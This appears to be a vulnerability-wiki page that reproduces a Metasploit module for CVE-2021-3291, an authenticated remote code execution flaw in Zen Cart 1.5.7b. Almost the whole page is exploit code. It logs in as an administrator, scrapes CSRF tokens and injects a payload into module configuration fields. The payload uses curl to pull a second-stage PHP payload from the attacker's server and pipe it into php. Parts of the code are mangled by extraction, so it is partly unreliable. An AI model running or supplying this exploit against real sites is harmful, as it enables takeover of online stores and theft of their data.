Loading
0

CVE-2021-3291 Zen Cart 1.5.7b 远程代码执行漏洞

免费、自由、人人可编辑的漏洞库

,

EXP

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
#
# This exploit  write payload in database and trig to command
# a bug in an zencart v1.5.7b web application
#
###
class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking
  
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Remote::HttpServer
  
    def initialize(info = {})
      super(
        update_info(
          info,
          'Name'           => 'zencart authenticated remote code execution exploit',
          'Description'    => %q(
              This exploit module execution os command in zencart.
          ),
          'License'        => MSF_LICENSE,
          'Author'         => 'Mucahit Saratar <email protected>', # msf module & research & poc
          'References'     =>
                 'OSVDB', '' ,
                 'EDB', '' ,
                 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc',
                 'CVE', '2021-3291'
            ,
          'Platform'       => 'php',
          'Privileged'     => false,
          'Arch'           => ARCH_PHP,
          'Targets'        =>  'Automatic', { } ,
          'DisclosureDate' => '2021-01-22',
          'DefaultTarget'  => 0
        )
      )
      register_options(
        
          Opt::RPORT(80),
          OptString.new('USERNAME',  true, 'User to login with', 'admin'),
          OptString.new('PASSWORD',  true, 'Password to login with', ''),
          OptString.new('BASEPATH',  true, 'zencart base path eg. /zencart/', '/'),
          OptString.new('MODULE',  true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment'),
          OptString.new('SETTING',  true, 'setting name. eg. freecharger for payment', 'freecharger'),
          OptString.new('TARGETURI',  true, 'Admin Panel Path', '/cracK-Fqu-trasH/')
        , self.class
      )
    end

    def start_server
        ssltut = false
        if datastore"SSL"
            ssltut = true
            datastore"SSL" = false
        end
        start_service({'Uri' => {
            'Proc' => Proc.new { |cli, req|
              on_request_uri(cli, req)
            },
            'Path' => resource_uri
        }})
        print_status("payload is on #{get_uri}")
        @adresim = get_uri
        datastore'SSL' = true if ssltut
    end
    
    def on_request_uri(cli, request)
        print_good('First stage is executed ! Sending 2nd stage of the payload')
        send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
      end

    def tabanyol
        datastore"BASEPATH"
    end

    def isim
        datastore"USERNAME"
    end

    def parola
        datastore"PASSWORD"
    end


    def login
        #"index.php?cmd=login&camefrom=index.php"
        res = send_request_cgi(
        'method'    => 'GET',
        'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
        'vars_get' => {
            'cmd' => 'login',
            'camefrom' => 'index.php'
        })
        # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
        unless res
            fail_with(Failure::Unreachable, "Access web application failure")
        end
        if res.code != 200
            fail_with(Failure::Unreachable, "we not have 200 response")
        end

        if !res.get_cookies.empty?
            @cookie = res.get_cookies
            @csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten0 || ''
            if @csrftoken.empty?
                fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
            end
            vprint_good("login Csrf token: "email protected)
        end

        res = send_request_cgi(
            'method' => 'POST',
            'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
            'cookie' => @cookie,
            'vars_post' => {
                'securityToken' => @csrftoken,
                'action' => "do"email protected,
                'admin_name' => isim,
                'admin_pass' => parola
            })
            if res.code != 302
                fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
            end
            true
        end


    def check
        unless login
            fail_with(Failure::UnexpectedReply, 'Wrong credentials')
            return CheckCode::NotVulnerable('Wrong credentials')
        end
        print_good("We loged in")
        Exploit::CheckCode::Vulnerable
        CheckCode::Vulnerable('Authenticated successfully')

    end

    def exploit
        check
        start_server
        sleep(4)
        res = send_request_cgi(
            'method' => 'GET',
            'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
            'vars_get' => {
                'cmd' => 'modules',
                'set' => datastore"MODULE",
                'module' => datastore"SETTING",
                'action' => 'edit'
            },
            'cookie' => @cookie
        )
        if res.code != 200
            fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
        end
        # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
        if res && res.code == 200
            @formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten0 || ''
            if @formtoken.empty?
                fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
            end
            #print_good(@formtoken)
            # <form name="modules" 
            @radiolar = res.body.scan(/<input type="radio" name="configuration\(.*)\" value="True"/)
            @selectler = res.body.scan(/<select rel="dropdown" name="configuration\(.*)\" class="form-control">/)
            @textarr = res.body.scan(/<input type="text" name="configuration\(.*)\" value="0" class="form-control" \/>/)
            @secme = {}
            @secme"securityToken" = @formtoken
            for @a in @radiolar
                @secme"configuration#{@a0}" = "True','F'); echo `curl #{@adresim} |php`; //"
            end
            for @a in @selectler
                @secme"configuration#{@a0}" = "0"
            end
            for @a in @textarr
                @secme"configuration#{@a0}" = "0"
            end
            print_good(@secme.to_s)
            res = send_request_cgi(
                'method' => 'POST',
                'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
                'cookie' => @cookie,
                'vars_get' => {
                    'cmd' => 'modules',
                    'set' => datastore"MODULE",
                    'module' => datastore"SETTING",
                    'action' => 'save'
                },
                'vars_post' => @secme
            )

            res = send_request_cgi(
                'method' => 'GET',
                'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
                'vars_get' => {
                    'cmd' => 'modules',
                    'set' => datastore"MODULE",
                    'module' => datastore"SETTING",
                    'action' => 'edit'
                },
                'cookie' => @cookie
            )

        end
    end
  end

免费、自由、人人可编辑的漏洞库--pwnwiki.com